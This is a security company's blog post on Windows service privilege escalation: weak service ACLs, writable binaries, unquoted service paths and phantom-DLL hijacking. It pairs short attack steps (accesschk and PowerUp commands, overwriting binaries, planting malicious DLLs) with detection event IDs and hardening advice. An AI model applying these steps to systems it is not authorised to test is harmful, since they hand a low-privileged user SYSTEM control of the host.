BIPI
BIPI

Windows Service Abuse: Weak Permissions, Unquoted Paths, DLL Hijacking

Cybersecurity

Three service-level privesc vectors that still work in modern Windows fleets. How to find them with accesschk and PowerUp, how to weaponize them, and how to harden services that actually need to run.

By Arjun Raghavan, Security & Systems Lead, BIPI · April 8, 2025 · 10 min read

#windows#services#dll-hijacking#unquoted-path#privesc

Why services are still the softest target

Services run as SYSTEM or LocalService and start on boot. If a low-priv user can rewrite the binary, the DLL it loads, or the path it resolves, that user owns the next reboot. Vendor installers continue to ship with sloppy ACLs and unquoted paths in 2024.

Vector 1: weak service ACLs

If you have SERVICE_CHANGE_CONFIG on a SYSTEM-run service, you can repoint binPath to any binary. PowerUp's Invoke-ServiceAbuse automates this end to end.

Vector 2: writable service binary

  • accesschk.exe -quvw "Authenticated Users" C:\path\to\service.exe
  • If write is granted, overwrite the binary and restart the service
  • Common with third-party agents in C:\Program Files\Vendor\
  • Pair with sc stop and sc start when you control the service rights

Vector 3: unquoted service paths

When binPath is C:\Program Files\Some Vendor\Sub Dir\svc.exe without quotes, Windows tries C:\Program.exe, then C:\Program Files\Some.exe, walking each space. If any of those directories is writable, plant a binary there.

Vector 4: DLL hijacking and phantom DLLs

  • Procmon filter: Path ends with .dll, Result is NAME NOT FOUND
  • Identify DLLs the service searches but never finds (phantom DLLs)
  • Drop a malicious DLL with matching name into a writable search path
  • Confirm load by attaching to the process and checking module list

Real CVEs you will still encounter

  • CVE-2022-26904 (SuperServiceProvider race) for token swapping via service
  • CVE-2021-1675 / 34527 PrintNightmare via Spooler DLL load
  • Many vendor LPE CVEs in EDR and backup agents from unquoted paths

Detection

Event 7045 logs service install, 7040 logs config change, 4697 mirrors at the security log. Sysmon Event 7 (image loaded) catches DLL side-loads when you allowlist signed modules. EDRs increasingly flag binPath changes that point outside Program Files.

Hardening

  • Quote every service path, audit with PowerUp.ps1 Get-ServiceUnquoted
  • Restrict service DACLs to admins, remove Authenticated Users
  • Enable Mandatory ASLR and CFG, run services with least privilege
  • Sign all in-house DLLs and enforce WDAC in audit then enforce mode
  • Defender ASR "Block executable content from email and webmail clients"
~40%
Enterprise hosts with at least one unquoted SYSTEM service
~15%
Vendor agents with writable install dirs (2024 sample)
common
DLL hijack chains found via Procmon in <5 min
If you skip service enumeration you skip the easiest SYSTEM in the building.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.